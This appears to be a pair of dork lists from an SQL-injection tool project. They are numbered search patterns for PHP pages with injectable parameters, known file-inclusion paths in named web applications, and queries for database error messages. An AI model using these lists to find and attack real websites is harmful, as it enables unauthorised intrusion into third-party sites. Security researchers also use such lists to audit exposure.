index3.php?abre= 788 | blank.php?where= 789 | info.php?start= 790 | page.php?secao= 791 | nota.php?pag= 792 | nota.php?second= 793 | index2.php?to= 794 | standard.php?name= 795 | start.php?strona= 796 | mod.php?numero= 797 | press.php?home= 798 | info.php?z= 799 | mod.php?path= 800 | blank.php?base_dir= 801 | base.php?texto= 802 | nota.php?secc= 803 | index.php?tipo= 804 | index.php?goto= 805 | print.php?pag= 806 | view.php?secao= 807 | general.php?strona= 808 | show.php?my= 809 | page.php?e= 810 | padrao.php?index= 811 | gery.php?thispage= 812 | start.php?base_dir= 813 | default.php?tipo= 814 | gery.php?panel= 815 | standard.php?ev= 816 | standard.php?destino= 817 | general.php?middle= 818 | main.php?basepath= 819 | standard.php?q= 820 | index1.php?tipo= 821 | mod.php?choix= 822 | template.php?ir= 823 | show.php?adresa= 824 | general.php?mid= 825 | index3.php?adresa= 826 | pagina.php?sec= 827 | template.php?secao= 828 | home.php?w= 829 | general.php?content= 830 | sub.php?recipe= 831 | main.php?category= 832 | enter.php?viewpage= 833 | main.php?ir= 834 | show.php?pageweb= 835 | principal.php?ir= 836 | default.php?pageweb= 837 | index.php?oldal= 838 | head.php?d= 839 | gery.php?mid= 840 | index.php?type= 841 | standard.php?j= 842 | show.php?oldal= 843 | enter.php?link= 844 | enter.php?content= 845 | blank.php?filepath= 846 | standard.php?channel= 847 | base.php?[]= 848 | info.php?incl= 849 | down.php?include= 850 | press.php?modo= 851 | file.php?choix= 852 | press.php?type= 853 | blank.php?goto= 854 | index3.php?showpage= 855 | principal.php?subject= 856 | start.php?chapter= 857 | show.php?r= 858 | pagina.php?thispage= 859 | general.php?chapter= 860 | page.php?base_dir= 861 | page.php?qry= 862 | show.php?incl= 863 | page.php?[]= 864 | main.php?h= 865 | file.php?seccion= 866 | default.php?pre= 867 | principal.php?index= 868 | principal.php?inc= 869 | home.php?z= 870 | pagina.php?in= 871 | show.php?play= 872 | nota.php?subject= 873 | default.php?secc= 874 | default.php?loader= 875 | padrao.php?var= 876 | mod.php?b= 877 | default.php?showpage= 878 | press.php?channel= 879 | pagina.php?ev= 880 | sitio.php?name= 881 | page.php?option= 882 | press.php?mid= 883 | down.php?corpo= 884 | view.php?get= 885 | print.php?thispage= 886 | principal.php?home= 887 | show.php?param= 888 | standard.php?sivu= 889 | index3.php?panel= 890 | include.php?play= 891 | path.php?cmd= 892 | file.php?sp= 893 | template.php?section= 894 | view.php?str= 895 | blank.php?left= 896 | nota.php?lang= 897 | path.php?sivu= 898 | main.php?e= 899 | default.php?ref= 900 | start.php?seite= 901 | default.php?inc= 902 | print.php?disp= 903 | home.php?h= 904 | principal.php?loc= 905 | index3.php?sp= 906 | gery.php?var= 907 | sub.php?base_dir= 908 | path.php?middle= 909 | pagina.php?str= 910 | base.php?play= 911 | base.php?v= 912 | sitio.php?sivu= 913 | main.php?r= 914 | file.php?nivel= 915 | start.php?sivu= 916 | template.php?c= 917 | general.php?second= 918 | sub.php?mod= 919 | home.php?loc= 920 | head.php?corpo= 921 | standard.php?op= 922 | index2.php?inc= 923 | info.php?pref= 924 | base.php?basepath= 925 | print.php?basepath= 926 | inc.php?m= 927 | base.php?home= 928 | layout.php?strona= 929 | padrao.php?url= 930 | sitio.php?oldal= 931 | pagina.php?read= 932 | index1.php?go= 933 | standard.php?s= 934 | page.php?eval= 935 | index.php?j= 936 | pagina.php?pr= 937 | start.php?secao= 938 | template.php?[]= 939 | nota.php?get= 940 | index3.php?link= 941 | home.php?e= 942 | gery.php?name= 943 | nota.php?eval= 944 | sub.php?abre= 945 | index2.php?load= 946 | principal.php?in= 947 | view.php?load= 948 | mod.php?action= 949 | default.php?p= 950 | head.php?c= 951 | template.php?viewpage= 952 | view.php?mid= 953 | padrao.php?addr= 954 | view.php?go= 955 | file.php?basepath= 956 | home.php?pre= 957 | include.php?goFile= 958 | layout.php?play= 959 | index1.php?subject= 960 | info.php?middlePart= 961 | down.php?pg= 962 | sub.php?bOdy= 963 | index.php?option= 964 | sub.php?chapter= 965 | default.php?t= 966 | head.php?opcion= 967 | nota.php?panel= 968 | sitio.php?left= 969 | show.php?include= 970 | pagina.php?start= 971 | head.php?choix= 972 | index3.php?tipo= 973 | index3.php?choix= 974 | down.php?channel= 975 | base.php?pa= 976 | nota.php?sekce= 977 | show.php?l= 978 | show.php?index= 979 | blank.php?url= 980 | start.php?thispage= 981 | nota.php?play= 982 | show.php?second= 983 | enter.php?include= 984 | principal.php?middle= 985 | main.php?where= 986 | padrao.php?link= 987 | path.php?strona= 988 | index3.php?read= 989 | mod.php?module= 990 | standard.php?viewpage= 991 | standard.php?pr= 992 | inc.php?showpage= 993 | pagina.php?ref= 994 | path.php?pname= 995 | padrao.php?mid= 996 | info.php?eval= 997 | include.php?path= 998 | page.php?subject= 999 | sub.php?qry= 1000 | head.php?module= 1001 | nota.php?opcion= 1002 | head.php?abre= 1003 | base.php?str= 1004 | home.php?bOdy= 1005 | gery.php?module= 1006 | head.php?sivu= 1007 | page.php?inc= 1008 | pagina.php?header= 1009 | mod.php?v= 1010 | home.php?doshow= 1011 | padrao.php?n= 1012 | index1.php?chapter= 1013 | padrao.php?basepath= 1014 | index.php?r= 1015 | index3.php?seccion= 1016 | sitio.php?mid= 1017 | index.php?where= 1018 | general.php?type= 1019 | pagina.php?goto= 1020 | page.php?pa= 1021 | default.php?menue= 1022 | main.php?goto= 1023 | index1.php?abre= 1024 | info.php?seccion= 1025 | index2.php?pa= 1026 | layout.php?pageweb= 1027 | nota.php?disp= 1028 | index1.php?bOdy= 1029 | default.php?nivel= 1030 | show.php?header= 1031 | down.php?pag= 1032 | start.php?tipo= 1033 | standard.php?w= 1034 | index.php?open= 1035 | blank.php?menu= 1036 | general.php?nivel= 1037 | padrao.php?nivel= 1038 | inc.php?addr= 1039 | index.php?var= 1040 | home.php?redirect= 1041 | inc.php?link= 1042 | inc.php?incl= 1043 | padrao.php?corpo= 1044 | down.php?url= 1045 | enter.php?goto= 1046 | down.php?addr= 1047 | sub.php?j= 1048 | principal.php?f= 1049 | sub.php?menue= 1050 | index2.php?section= 1051 | general.php?my= 1052 | head.php?loader= 1053 | general.php?goto= 1054 | include.php?dir= 1055 | start.php?header= 1056 | blank.php?in= 1057 | base.php?name= 1058 | nota.php?goFile= 1059 | head.php?base_dir= 1060 | mod.php?recipe= 1061 | press.php?pr= 1062 | padrao.php?[]= 1063 | layout.php?opcion= 1064 | print.php?rub= 1065 | index.php?pr= 1066 | general.php?seite= 1067 | pagina.php?numero= 1068 | inc.php?pg= 1069 | nota.php?rub= 1070 | view.php?seite= 1071 | pagina.php?recipe= 1072 | index.php?pref= 1073 | page.php?action= 1074 | page.php?ev= 1075 | show.php?ir= 1076 | head.php?index= 1077 | mod.php?pname= 1078 | view.php?ir= 1079 | inc.php?start= 1080 | principal.php?rub= 1081 | principal.php?corpo= 1082 | padrao.php?middle= 1083 | base.php?pname= 1084 | template.php?header= 1085 | view.php?sp= 1086 | main.php?name= 1087 | nota.php?m= 1088 | blank.php?open= 1089 | head.php?dir= 1090 | page.php?pname= 1091 | inc.php?k= 1092 | index.php?pollname= 1093 | head.php?oldal= 1094 | index1.php?str= 1095 | template.php?choix= 1096 | down.php?pollname= 1097 | page.php?recipe= 1098 | template.php?corpo= 1099 | nota.php?sec= 1100 | info.php?[]= 1101 | sub.php?[]= 1102 | page.php?q= 1103 | index1.php?type= 1104 | gery.php?y= 1105 | standard.php?lang= 1106 | gery.php?page= 1107 | index.php?action= 1108 | press.php?pname= 1109 | down.php?v= 1110 | index3.php?second= 1111 | show.php?recipe= 1112 | main.php?pre= 1113 | file.php?numero= 1114 | print.php?str= 1115 | standard.php?link= 1116 | nota.php?OpenPage= 1117 | view.php?pollname= 1118 | print.php?l= 1119 | index.php?go= 1120 | standard.php?numero= 1121 | view.php?pr= 1122 | down.php?read= 1123 | down.php?action= 1124 | index1.php?OpenPage= 1125 | principal.php?left= 1126 | mod.php?start= 1127 | file.php?bOdy= 1128 | gery.php?pg= 1129 | blank.php?qry= 1130 | base.php?eval= 1131 | default.php?left= 1132 | gery.php?param= 1133 | blank.php?pa= 1134 | nota.php?b= 1135 | path.php?loader= 1136 | start.php?o= 1137 | include.php?include= 1138 | nota.php?corpo= 1139 | enter.php?second= 1140 | sub.php?pname= 1141 | mod.php?pageweb= 1142 | principal.php?addr= 1143 | standard.php?action= 1144 | template.php?lang= 1145 | include.php?basepath= 1146 | sub.php?ir= 1147 | /single-post.php?id= 1148 | /post.php?id= 1149 | /news.php?id= 1150 | down.php?nivel= 1151 | path.php?opcion= 1152 | print.php?category= 1153 | print.php?menu= 1154 | layout.php?secao= 1155 | template.php?param= 1156 | /page.php?id= 1157 | standard.php?ref= 1158 | base.php?include= 1159 | blank.php?bOdy= 1160 | path.php?pref= 1161 | print.php?g= 1162 | /product.php?id= 1163 | padrao.php?subject= 1164 | nota.php?modo= 1165 | index3.php?loader= 1166 | template.php?seite= 1167 | general.php?pageweb= 1168 | index2.php?param= 1169 | path.php?nivel= 1170 | page.php?pref= 1171 | press.php?pref= 1172 | enter.php?ev= 1173 | standard.php?middle= 1174 | index2.php?recipe= 1175 | blank.php?dir= 1176 | home.php?pageweb= 1177 | view.php?panel= 1178 | down.php?home= 1179 | head.php?ir= 1180 | mod.php?ir= 1181 | show.php?pagina= 1182 | default.php?base_dir= 1183 | show.php?loader= 1184 | path.php?mid= 1185 | blank.php?abre= 1186 | down.php?choix= 1187 | info.php?opcion= 1188 | page.php?loader= 1189 | principal.php?oldal= 1190 | index1.php?load= 1191 | home.php?content= 1192 | pagina.php?sekce= 1193 | file.php?n= 1194 | include.php?redirect= 1195 | print.php?itemnav= 1196 | enter.php?index= 1197 | print.php?middle= 1198 | sitio.php?goFile= 1199 | head.php?include= 1200 | enter.php?e= 1201 | index.php?play= 1202 | enter.php?id= 1203 | view.php?mod= 1204 | show.php?nivel= 1205 | file.php?channel= 1206 | layout.php?choix= 1207 | info.php?bOdy= 1208 | include.php?go= 1209 | index3.php?nivel= 1210 | sub.php?include= 1211 | path.php?numero= 1212 | principal.php?header= 1213 | main.php?opcion= 1214 | enter.php?s= 1215 | sub.php?pre= 1216 | include.php?index= 1217 | gery.php?pageweb= 1218 | padrao.php?path= 1219 | info.php?url= 1220 | press.php?ev= 1221 | index1.php?pg= 1222 | print.php?in= 1223 | general.php?modo= 1224 | head.php?ki= 1225 | press.php?my= 1226 | index1.php?pollname= 1227 | principal.php?to= 1228 | default.php?play= 1229 | page.php?g= 1230 | nota.php?pg= 1231 | blank.php?destino= 1232 | blank.php?z= 1233 | /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine 1234 | mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= 1235 | zentrack/index.php?configFile= 1236 | inst/index.php?lng=../../include/main.inc&G_PATH= 1237 | pivot/modules/module_db.php?pivot_path= 1238 | include/write.php?dir= 1239 | includes/header.php?systempath= 1240 | becommunity/community/index.php?pageurl= 1241 | agendax/addevent.inc.php?agendax_path= 1242 | myPHPCalendar/admin.php?cal_dir= 1243 | yabbse/Sources/Packages.php?sourcedir= 1244 | zboard/zboard.php 1245 | path_of_cpcommerce/_functions.php?prefix 1246 | dotproject/modules/projects/addedit.php?root_dir= 1247 | dotproject/modules/projects/view.php?root_dir= 1248 | dotproject/modules/projects/vw_files.php?root_dir= 1249 | dotproject/modules/tasks/addedit.php?root_dir= 1250 | dotproject/modules/tasks/viewgantt.php?root_dir= 1251 | My_eGery/public/displayCategory.php?basepath= 1252 | modules/My_eGery/public/displayCategory.php?basepath= 1253 | modules/4nAlbum/public/displayCategory.php?basepath= 1254 | modules/coppermine/themes/default/theme.php?THEME_DIR= 1255 | modules/agendax/addevent.inc.php?agendax_path= 1256 | modules/xoopsgery/upgrade_album.php?GERY_BASEDIR= 1257 | modules/xgery/upgrade_album.php?GERY_BASEDIR= 1258 | modules/coppermine/include/init.inc.php?CPG_M_DIR= 1259 | shoutbox/expanded.php?conf= 1260 | library/editor/editor.php?root= 1261 | library/lib.php?root= 1262 | main.php?x= 1263 | default.php?page= 1264 | default.php?bOdy= 1265 | index.php?url= 1266 | index.php?arquivo= 1267 | index.php?include= 1268 | index.php?visualizar= 1269 | index.php?pagina= 1270 | index.php?page= 1271 | index.php?p= 1272 | index.php?cont= 1273 | index.php?x= 1274 | index.php?cat= 1275 | index.php?site= 1276 | index.php?configFile= 1277 | index.php?do= 1278 | index2.php?x= 1279 | Index.php?id= 1280 | /components/com_forum/download.php?phpbb_root_path= 1281 | /admin/index.php?o= admin/index.php 1282 | /admin/index.php?o= admin/index.php 1283 | index.php?menu=deti&page= 1284 | /tools/send_reminders.php?includedir= 1285 | SQuery/lib/gore.php?libpath= 1286 | m2f/m2f_phpbb204.php?m2f_root_path= 1287 | wamp_dir/setup/yesno.phtml?no_url= 1288 | components/com_forum/download.php?phpbb_root_path= 1289 | index.php?p= 1290 | index.php?pag= 1291 | template.php?page= 1292 | main.php?page= 1293 | index2.php?pag= 1294 | home.php?pag= 1295 | index.php?page= 1296 | default.php?page= 1297 | inc/cmses/aedatingCMS.php?dir[inc]= 1298 | /modules/vwar/admin/admin.php?vwar_root= 1299 | bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= 1300 | encapscms_PATH/core/core.php?root= 1301 | inc/session.php?sessionerror=0&lang= 1302 | path/index.php?function=custom&custom= 1303 | [MyAlbum_DIR]/language.inc.php?langs_dir= 1304 | /inc/irayofuncs.php?irayodirhack= 1305 | index.php?function=custom&custom= 1306 | inc/header.php/step_one.php?server_inc= 1307 | inst/index.php?lng= 1308 | inc/pipe.php?HCL_path= 1309 | include/new-visitor.inc.php?lvc_include_dir= 1310 | includes/header.php?systempath= 1311 | support/mailling/maillist/inc/initdb.php?absolute_path= 1312 | coppercop/theme.php?THEME_DIR= 1313 | zentrack/index.php?configFile= 1314 | include/write.php?dir= 1315 | include/new-visitor.inc.php?lvc_include_dir= 1316 | includes/header.php?systempath= 1317 | support/mailling/maillist/inc/initdb.php?absolute_path= 1318 | coppercop/theme.php?THEME_DIR= 1319 | becommunity/community/index.php?pageurl= 1320 | shoutbox/expanded.php?conf= 1321 | agendax/addevent.inc.php?agendax_path= 1322 | myPHPCalendar/admin.php?cal_dir= 1323 | yabbse/Sources/Packages.php?sourcedir= 1324 | path_of_cpcommerce/_functions.php?prefix= 1325 | dotproject/modules/tasks/viewgantt.php?root_dir= 1326 | My_eGery/public/displayCategory.php?basepath= 1327 | modules/My_eGery/public/displayCategory.php?basepath= 1328 | modules/4nAlbum/public/displayCategory.php?basepath= 1329 | modules/coppermine/themes/default/theme.php?THEME_DIR= 1330 | modules/agendax/addevent.inc.php?agendax_path= 1331 | modules/xoopsgery/upgrade_album.php?GERY_BASEDIR= 1332 | modules/xgery/upgrade_album.php?GERY_BASEDIR= 1333 | modules/coppermine/include/init.inc.php?CPG_M_DIR= 1334 | modules/mod_mainmenu.php?mosConfig_absolute_path= 1335 | pivot/modules/module_db.php?pivot_path= 1336 | library/editor/editor.php?root= 1337 | library/lib.php?root= 1338 | e107/e107_handlers/secure_img_render.php?p= 1339 | main.php?x= 1340 | main.php?page= 1341 | default.php?page= 1342 | default.php?bOdy= 1343 | default.php?page= 1344 | index.php?url= 1345 | index.php?arquivo= 1346 | index.php?meio.php= 1347 | index.php?include= 1348 | index.php?open= 1349 | index.php?visualizar= 1350 | index.php?pagina= 1351 | index.php?inc= 1352 | index.php?page= 1353 | index.php?pag= 1354 | index.php?p= 1355 | index.php?content= 1356 | index.php?cont= 1357 | index.php?c= 1358 | index.php?meio= 1359 | index.php?x= 1360 | index.php?cat= 1361 | index.php?site= 1362 | index.php?configFile= 1363 | index.php?action= 1364 | index.php?do= 1365 | index2.php?x= 1366 | Index.php?id= 1367 | announcements.php?phpraid_dir= 1368 | arg.php?arg= 1369 | args.php?arg= 1370 | atom.php5?page= 1371 | auto.php?inc= 1372 | auto.php?page= 1373 | base.php?f1= 1374 | base.php?f1= 1375 | board.php?see= 1376 | book.php5?page= 1377 | calendar.php?l= -------------------------------------------------------------------------------- /Ex-SQLi-Windows/dork.txt: -------------------------------------------------------------------------------- 1 | single-post.php?id= 2 | en/product.php?id= 3 | trainers.php?id= 4 | play_old.php?id= 5 | declaration_more.php?decl_id= 6 | Pageid= 7 | games.php?id= 8 | newsDetail.php?id= 9 | staff_id= 10 | historialeer.php?num= 11 | product-item.php?id= 12 | news_view.php?id= 13 | humor.php?id= 14 | communique_detail.php?id= 15 | sem.php3?id= 16 | opinions.php?id= 17 | spr.php?id= 18 | pages.php?id= 19 | chappies.php?id= 20 | prod_detail.php?id= 21 | viewphoto.php?id= 22 | view.php?id= 23 | website.php?id= 24 | hosting_info.php?id= 25 | gery.php?id= 26 | detail.php?ID= 27 | publications.php?id= 28 | Productinfo.php?id= 29 | releases.php?id= 30 | ray.php?id= 31 | produit.php?id= 32 | pop.php?id= 33 | shopping.php?id= 34 | productdetail.php?id= 35 | post.php?id= 36 | section.php?id= 37 | theme.php?id= 38 | page.php?id= 39 | shredder-categories.php?id= 40 | product_ranges_view.php?ID= 41 | shop_category.php?id= 42 | channel_id= 43 | newsid= 44 | news_display.php?getid= 45 | ages.php?id= 46 | clanek.php4?id= 47 | review.php?id= 48 | iniziativa.php?in= 49 | curriculum.php?id= 50 | labels.php?id= 51 | look.php?ID= 52 | galeri_info.php?l= 53 | tekst.php?idt= 54 | newscat.php?id= 55 | newsticker_info.php?idn= 56 | rubrika.php?idr= 57 | offer.php?idf= 58 | index.php?id= 59 | buy.php?category= 60 | article.php?ID= 61 | play_old.php?id= 62 | newsitem.php?num= 63 | top10.php?cat= 64 | historialeer.php?num= 65 | reagir.php?num= 66 | Stray-Questions-View.php?num= 67 | forum_bds.php?num= 68 | game.php?id= 69 | view_product.php?id= 70 | sw_comment.php?id= 71 | news.php?id= 72 | avd_start.php?avd= 73 | event.php?id= 74 | sql.php?id= 75 | news_view.php?id= 76 | select_biblio.php?id= 77 | humor.php?id= 78 | ogl_inet.php?ogl_id= 79 | fiche_spectacle.php?id= 80 | communique_detail.php?id= 81 | sem.php3?id= 82 | kategorie.php4?id= 83 | faq2.php?id= 84 | show_an.php?id= 85 | preview.php?id= 86 | loadpsb.php?id= 87 | opinions.php?id= 88 | spr.php?id= 89 | announce.php?id= 90 | participant.php?id= 91 | download.php?id= 92 | main.php?id= 93 | review.php?id= 94 | chappies.php?id= 95 | read.php?id= 96 | prod_detail.php?id= 97 | article.php?id= 98 | person.php?id= 99 | productinfo.php?id= 100 | showimg.php?id= 101 | view.php?id= 102 | website.php?id= 103 | hosting_info.php?id= 104 | gery.php?id= 105 | rub.php?idr= 106 | view_faq.php?id= 107 | artikelinfo.php?id= 108 | detail.php?ID= 109 | index.php?= 110 | profile_view.php?id= 111 | category.php?id= 112 | publications.php?id= 113 | fellows.php?id= 114 | downloads_info.php?id= 115 | prod_info.php?id= 116 | shop.php?do=part&id= 117 | collectionitem.php?id= 118 | band_info.php?id= 119 | product.php?id= 120 | releases.php?id= 121 | ray.php?id= 122 | produit.php?id= 123 | pop.php?id= 124 | shopping.php?id= 125 | productdetail.php?id= 126 | post.php?id= 127 | viewshowdetail.php?id= 128 | clubpage.php?id= 129 | memberInfo.php?id= 130 | section.php?id= 131 | theme.php?id= 132 | page.php?id= 133 | shredder-categories.php?id= 134 | tradeCategory.php?id= 135 | product_ranges_view.php?ID= 136 | shop_category.php?id= 137 | transcript.php?id= 138 | channel_id= 139 | item_id= 140 | newsid= 141 | trainers.php?id= 142 | news-full.php?id= 143 | news_display.php?getid= 144 | index2.php?option= 145 | readnews.php?id= 146 | newsone.php?id= 147 | product-item.php?id= 148 | pages.php?id= 149 | clanek.php4?id= 150 | viewapp.php?id= 151 | viewphoto.php?id= 152 | galeri_info.php?l= 153 | iniziativa.php?in= 154 | curriculum.php?id= 155 | labels.php?id= 156 | story.php?id= 157 | look.php?ID= 158 | aboutbook.php?id= 159 | “id=” & intext:”Warning: mysql_fetch_assoc() 160 | “id=” & intext:”Warning: is_writable() 161 | “id=” & intext:”Warning: Unknown() 162 | “id=” & intext:”Warning: mysql_result() 163 | “id=” & intext:”Warning: pg_exec() 164 | “id=” & intext:”Warning: require() 165 | buy.php?category= 166 | pageid= 167 | page.php?file= 168 | show.php?id= 169 | newsitem.php?num= 170 | readnews.php?id= 171 | top10.php?cat= 172 | reagir.php?num= 173 | Stray-Questions-View.php?num= 174 | forum_bds.php?num= 175 | game.php?id= 176 | view_product.php?id= 177 | sw_comment.php?id= 178 | news.php?id= 179 | avd_start.php?avd= 180 | event.php?id= 181 | sql.php?id= 182 | select_biblio.php?id= 183 | ogl_inet.php?ogl_id= 184 | fiche_spectacle.php?id= 185 | kategorie.php4?id= 186 | faq2.php?id= 187 | show_an.php?id= 188 | loadpsb.php?id= 189 | announce.php?id= 190 | participant.php?id= 191 | download.php?id= 192 | article.php?id= 193 | person.php?id= 194 | productinfo.php?id= 195 | showimg.php?id= 196 | rub.php?idr= 197 | view_faq.php?id= 198 | artikelinfo.php?id= 199 | index.php?= 200 | profile_view.php?id= 201 | category.php?id= 202 | fellows.php?id= 203 | downloads_info.php?id= 204 | prod_info.php?id= 205 | shop.php?do=part&id= 206 | collectionitem.php?id= 207 | band_info.php?id= 208 | product.php?id= 209 | viewshowdetail.php?id= 210 | clubpage.php?id= 211 | memberInfo.php?id= 212 | tradeCategory.php?id= 213 | transcript.php?id= 214 | item_id= 215 | news-full.php?id= 216 | aboutbook.php?id= 217 | preview.php?id= 218 | material.php?id= 219 | read.php?id= 220 | viewapp.php?id= 221 | story.php?id= 222 | newsone.php?id= 223 | rubp.php?idr= 224 | art.php?idm= 225 | title.php?id= 226 | index1.php?modo= 227 | include.php?[]= 228 | nota.php?pollname= 229 | index3.php?p= 230 | padrao.php?pre= 231 | home.php?pa= 232 | main.php?type= 233 | sitio.php?start= 234 | .php?include= 235 | general.php?xlink= 236 | show.php?go= 237 | nota.php?ki= 238 | down.php?oldal= 239 | layout.php?disp= 240 | enter.php?chapter= 241 | base.php?incl= 242 | enter.php?mod= 243 | show.php?corpo= 244 | head.php?[]= 245 | info.php?strona= 246 | template.php?str= 247 | main.php?doshow= 248 | view.php?[]= 249 | index.php?to= 250 | page.php?cmd= 251 | view.php?b= 252 | info.php?option= 253 | show.php?x= 254 | template.php?texto= 255 | index3.php?ir= 256 | print.php?chapter= 257 | file.php?inc= 258 | file.php?cont= 259 | view.php?cmd= 260 | include.php?chapter= 261 | path.php?my= 262 | principal.php?param= 263 | general.php?menue= 264 | index1.php?b= 265 | info.php?chapter= 266 | nota.php?chapter= 267 | general.php?include= 268 | start.php?addr= 269 | index1.php?qry= 270 | index1.php?loc= 271 | page.php?addr= 272 | index1.php?dir= 273 | principal.php?pr= 274 | press.php?seite= 275 | head.php?cmd= 276 | home.php?sec= 277 | home.php?category= 278 | standard.php?cmd= 279 | mod.php?thispage= 280 | base.php?to= 281 | view.php?choix= 282 | base.php?panel= 283 | template.php?mod= 284 | info.php?j= 285 | blank.php?pref= 286 | sub.php?channel= 287 | standard.php?in= 288 | general.php?cmd= 289 | pagina.php?panel= 290 | template.php?where= 291 | path.php?channel= 292 | gery.php?seccion= 293 | page.php?tipo= 294 | sitio.php?rub= 295 | pagina.php?u= 296 | file.php?ir= 297 | inc.php?sivu= 298 | path.php?start= 299 | page.php?chapter= 300 | home.php?recipe= 301 | enter.php?pname= 302 | layout.php?path= 303 | print.php?open= 304 | mod.php?channel= 305 | down.php?phpbb_root_path= 306 | inc.php?str= 307 | gery.php?phpbb_root_path= 308 | include.php?middlePart= 309 | sub.php?destino= 310 | info.php?read= 311 | home.php?sp= 312 | main.php?strona= 313 | sitio.php?get= 314 | sitio.php?index= 315 | index3.php?option= 316 | enter.php?a= 317 | main.php?second= 318 | print.php?pname= 319 | blank.php?itemnav= 320 | blank.php?pagina= 321 | index1.php?d= 322 | down.php?where= 323 | inc.php?include= 324 | path.php?pre= 325 | home.php?loader= 326 | start.php?eval= 327 | index.php?disp= 328 | head.php?mod= 329 | sitio.php?section= 330 | nota.php?doshow= 331 | home.php?seite= 332 | home.php?a= 333 | page.php?url= 334 | pagina.php?left= 335 | layout.php?c= 336 | principal.php?goto= 337 | standard.php?base_dir= 338 | home.php?where= 339 | page.php?sivu= 340 | inc.php?adresa= 341 | padrao.php?str= 342 | include.php?my= 343 | show.php?home= 344 | index.php?load= 345 | index3.php?rub= 346 | sub.php?str= 347 | start.php?index= 348 | nota.php?mod= 349 | sub.php?mid= 350 | index1.php?[]= 351 | pagina.php?oldal= 352 | padrao.php?loc= 353 | padrao.php?rub= 354 | page.php?incl= 355 | gery.php?disp= 356 | nota.php?oldal= 357 | include.php?u= 358 | principal.php?pagina= 359 | print.php?choix= 360 | head.php?filepath= 361 | include.php?corpo= 362 | sub.php?action= 363 | head.php?pname= 364 | press.php?dir= 365 | show.php?xlink= 366 | file.php?left= 367 | nota.php?destino= 368 | general.php?module= 369 | index3.php?redirect= 370 | down.php?param= 371 | default.php?ki= 372 | padrao.php?h= 373 | padrao.php?read= 374 | mod.php?cont= 375 | index1.php?l= 376 | down.php?pr= 377 | gery.php?viewpage= 378 | template.php?load= 379 | nota.php?pr= 380 | padrao.php?destino= 381 | index2.php?channel= 382 | principal.php?opcion= 383 | start.php?str= 384 | press.php?[]= 385 | index.php?ev= 386 | pagina.php?pre= 387 | nota.php?content= 388 | include.php?adresa= 389 | sitio.php?t= 390 | index.php?sivu= 391 | principal.php?q= 392 | path.php?ev= 393 | print.php?module= 394 | index.php?loc= 395 | nota.php?basepath= 396 | padrao.php?tipo= 397 | index2.php?in= 398 | principal.php?eval= 399 | file.php?qry= 400 | info.php?t= 401 | enter.php?play= 402 | general.php?var= 403 | principal.php?s= 404 | standard.php?pagina= 405 | standard.php?subject= 406 | base.php?second= 407 | head.php?inc= 408 | pagina.php?basepath= 409 | main.php?pname= 410 | inc.php?modo= 411 | include.php?goto= 412 | file.php?pg= 413 | head.php?g= 414 | general.php?header= 415 | start.php?root= 416 | enter.php?pref= 417 | index3.php?open= 418 | start.php?module= 419 | main.php?load= 420 | enter.php?pg= 421 | padrao.php?redirect= 422 | pagina.php?my= 423 | gery.php?pre= 424 | enter.php?w= 425 | info.php?texto= 426 | enter.php?open= 427 | base.php?rub= 428 | gery.php?[]= 429 | include.php?cmd= 430 | standard.php?dir= 431 | layout.php?page= 432 | index3.php?pageweb= 433 | include.php?numero= 434 | path.php?destino= 435 | index3.php?home= 436 | default.php?seite= 437 | path.php?eval= 438 | base.php?choix= 439 | template.php?cont= 440 | info.php?pagina= 441 | default.php?x= 442 | default.php?option= 443 | gery.php?ki= 444 | down.php?second= 445 | blank.php?path= 446 | pagina.php?v= 447 | file.php?pollname= 448 | index3.php?var= 449 | layout.php?goto= 450 | pagina.php?incl= 451 | home.php?action= 452 | include.php?oldal= 453 | print.php?left= 454 | print.php?u= 455 | nota.php?v= 456 | home.php?str= 457 | press.php?panel= 458 | page.php?mod= 459 | default.php?param= 460 | down.php?texto= 461 | mod.php?dir= 462 | view.php?where= 463 | blank.php?subject= 464 | path.php?play= 465 | base.php?l= 466 | index2.php?rub= 467 | general.php?opcion= 468 | layout.php?xlink= 469 | padrao.php?name= 470 | pagina.php?nivel= 471 | default.php?oldal= 472 | template.php?k= 473 | main.php?chapter= 474 | layout.php?chapter= 475 | layout.php?incl= 476 | include.php?url= 477 | base.php?sivu= 478 | index.php?link= 479 | sub.php?cont= 480 | info.php?oldal= 481 | general.php?rub= 482 | default.php?str= 483 | head.php?ev= 484 | sub.php?path= 485 | view.php?page= 486 | main.php?j= 487 | index2.php?basepath= 488 | gery.php?qry= 489 | main.php?url= 490 | default.php?incl= 491 | show.php?redirect= 492 | index1.php?pre= 493 | general.php?base_dir= 494 | start.php?in= 495 | show.php?abre= 496 | index1.php?home= 497 | home.php?ev= 498 | index2.php?ki= 499 | base.php?pag= 500 | default.php?ir= 501 | general.php?qry= 502 | index2.php?home= 503 | press.php?nivel= 504 | enter.php?pr= 505 | blank.php?loader= 506 | start.php?cmd= 507 | padrao.php?d= 508 | sitio.php?recipe= 509 | principal.php?read= 510 | standard.php?showpage= 511 | main.php?pg= 512 | page.php?panel= 513 | press.php?addr= 514 | template.php?s= 515 | main.php?tipo= 516 | inc.php?ev= 517 | padrao.php?page= 518 | show.php?thispage= 519 | home.php?secao= 520 | main.php?start= 521 | enter.php?mid= 522 | press.php?id= 523 | main.php?inc= 524 | index3.php?cmd= 525 | index.php?pname= 526 | press.php?subject= 527 | include.php?sec= 528 | index3.php?xlink= 529 | general.php?texto= 530 | index3.php?go= 531 | index.php?cmd= 532 | index3.php?disp= 533 | index3.php?left= 534 | sub.php?middle= 535 | show.php?modo= 536 | index1.php?pagina= 537 | head.php?left= 538 | enter.php?phpbb_root_path= 539 | show.php?z= 540 | start.php?basepath= 541 | blank.php?strona= 542 | template.php?y= 543 | page.php?where= 544 | layout.php?category= 545 | index1.php?my= 546 | principal.php?phpbb_root_path= 547 | nota.php?channel= 548 | page.php?choix= 549 | start.php?xlink= 550 | home.php?k= 551 | standard.php?phpbb_root_path= 552 | principal.php?middlePart= 553 | mod.php?m= 554 | index.php?recipe= 555 | template.php?path= 556 | pagina.php?dir= 557 | sitio.php?abre= 558 | index1.php?recipe= 559 | blank.php?page= 560 | sub.php?category= 561 | inc.php?bOdy= 562 | enter.php?middle= 563 | home.php?path= 564 | down.php?pre= 565 | base.php?w= 566 | main.php?path= 567 | nota.php?ir= 568 | press.php?link= 569 | gery.php?pollname= 570 | down.php?open= 571 | down.php?pageweb= 572 | default.php?eval= 573 | view.php?showpage= 574 | show.php?get= 575 | sitio.php?tipo= 576 | layout.php?cont= 577 | 